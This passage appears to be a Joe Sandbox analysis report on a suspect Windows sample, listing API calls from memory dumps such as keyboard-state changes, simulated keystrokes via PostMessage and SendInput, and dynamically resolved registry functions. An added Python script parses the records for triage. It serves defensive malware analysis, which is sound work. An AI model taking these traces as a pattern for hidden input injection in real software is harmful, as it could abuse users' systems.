                                                                                                                            • String ID: 0vH
                                                                                                                            • API String ID: 327565842-3662162768
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
• GetFocus.USER32 ref: 00448B1C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Window$Enable$Show$FocusMessageSend
• String ID:
• API String ID: 3429747543-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D32F
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
• __swprintf.LIBCMT ref: 0045D3CC
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$HH
• API String ID: 3164766367-3924996404
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
APIs
• ImageList_Destroy.COMCTL32(?), ref: 00455451
• ImageList_Destroy.COMCTL32(?), ref: 0045545F
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Destroy$DeleteImageList_ObjectWindow$Icon
• String ID:
• API String ID: 3985565216-0
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415737
• __calloc_crt.LIBCMT ref: 00415743
• __getptd.LIBCMT ref: 00415750
• CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
• __dosmaperr.LIBCMT ref: 004157A9
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• String ID:
• API String ID: 1269668773-0
APIs
  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
  • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
• GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
• CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 0041569B
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004156AD
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
• __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4166825349-0
                                                                                                                            • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                            • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                            • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                            • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                            • API String ID: 2574300362-3261711971
                                                                                                                            • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                            • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                            • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                            • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                            • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                            • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                            • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                            APIs
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                            • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3220332590-0
                                                                                                                            • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                            • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                            • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                            • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1612042205-0
                                                                                                                            • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                            • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                            • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                            • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                            • SendInput.USER32 ref: 0044C6E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2221674350-0
                                                                                                                            • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                            • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                            • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                            • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
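The function summaries above are machine output and only become useful for triage once pulled into a structured form. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It parses records in the layout shown on this page (bullet API lines ending in `ref: <address>`, including the indented `Part of subcall function` lines, followed by the Similarity fields), drops the `Download File` link label from the `Associated` lines, and runs two triage passes over the result: it pairs `LoadLibrary*` with `GetProcAddress` to list dynamically resolved imports (the behaviour the report flags as "Contains functionality to dynamically determine API calls", here `advapi32.dll` / `RegDeleteKeyExW`), and it decodes the `uMsg` argument of the `PostMessageW` calls in the keyboard record to their Win32 names (0x0104 WM_SYSKEYDOWN, 0x0100 WM_KEYDOWN, 0x0102 WM_CHAR). Assumptions: each record ends with its `Instruction Fuzzy Hash` field, which holds for every record on this page; the embedded `SAMPLE` is copied from two of the records above and shortened.

```python
"""Parse the per-function "APIs" / "Similarity" records of a Joe Sandbox report
(the plain-text layout on this page) into structured data for triage.
Editor-added example, not Joe Security code.  SAMPLE is copied from two records
above (shortened); assumed: every record ends with "Instruction Fuzzy Hash"."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• Name.MODULE(args), ref: ADDR", "• Name.MODULE ref: ADDR", and the indented
# "• Part of subcall function ADDR: Name.MODULE(args), ref: ADDR".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[\w@$]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
# Win32 window messages seen as the uMsg argument of PostMessageW above.
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x102: "WM_CHAR",
            0x104: "WM_SYSKEYDOWN", 0x105: "WM_SYSKEYUP"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]            # [] when the report prints no argument list
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address for "Part of subcall" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, object] = field(default_factory=dict)

def parse_records(text: str) -> List[FunctionRecord]:
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_LINE.match(line):
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
        elif f := FIELD_LINE.match(line):
            key, value = f["key"], f["value"].strip()
            if key == "Associated":  # drop the page's "Download File" link label
                cur.fields.setdefault(key, []).append(value.replace("Download File", "").strip())
            else:
                cur.fields[key] = value
            if key == "Instruction Fuzzy Hash":  # last field of every record
                records.append(cur)
                cur = FunctionRecord()
        # bare section headers ("APIs", "Similarity", ...) carry no data
    return records

def dynamically_resolved_imports(records):
    """(library, symbol, call site) where LoadLibrary* is paired with GetProcAddress,
    the pattern behind 'Contains functionality to dynamically determine API calls'."""
    hits = []
    for rec in records:
        libs = [a.args[0] for a in rec.apis if a.name.startswith("LoadLibrary") and a.args]
        for a in rec.apis:
            if libs and a.name == "GetProcAddress" and len(a.args) >= 2:
                hits.append((libs[0], a.args[1], a.ref))
    return hits

def posted_key_messages(records):
    """Decode the uMsg argument of Post/SendMessage calls; skips unrecovered '?'."""
    out = []
    for rec in records:
        for a in rec.apis:
            if a.name in ("PostMessageA", "PostMessageW", "SendMessageA", "SendMessageW") \
                    and len(a.args) >= 2:
                try:
                    msg = int(a.args[1], 16)
                except ValueError:
                    continue  # argument not recovered by the sandbox ("?")
                out.append((a.ref, WM_NAMES.get(msg, f"0x{msg:04X}")))
    return out

SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
Memory Dump Source
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: AddressLibraryLoadProc
• API String ID: 2574300362-3261711971
• Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
APIs
• GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
• SetKeyboardState.USER32(00000080), ref: 0044C59B
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
• SendInput.USER32 ref: 0044C6E2
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
"""
```

Feed the whole "APIs" section of the report (or the `.jbxd`-derived text export) to `parse_records` and the fuzzy hashes, API String IDs and call sites come out as fields you can diff across samples. Two caveats when reading the output: a single `LoadLibraryA("advapi32.dll")` / `GetProcAddress("RegDeleteKeyExW")` pair is also what ordinary compatibility shims do (RegDeleteKeyExW is absent on older Windows), so it is weak evidence on its own and gains weight only together with the injection and credential-theft behaviours listed in the report's signature section; and the `?` placeholders mean the sandbox did not recover that argument, so the decoder skips them rather than guessing.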
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$_wcscat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2037614760-0
                                                                                                                            • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                            • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                            • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                            • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                            APIs
                                                                                                                            • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4189319755-0
                                                                                                                            • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                            • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                            • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                            • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
• EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
• LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
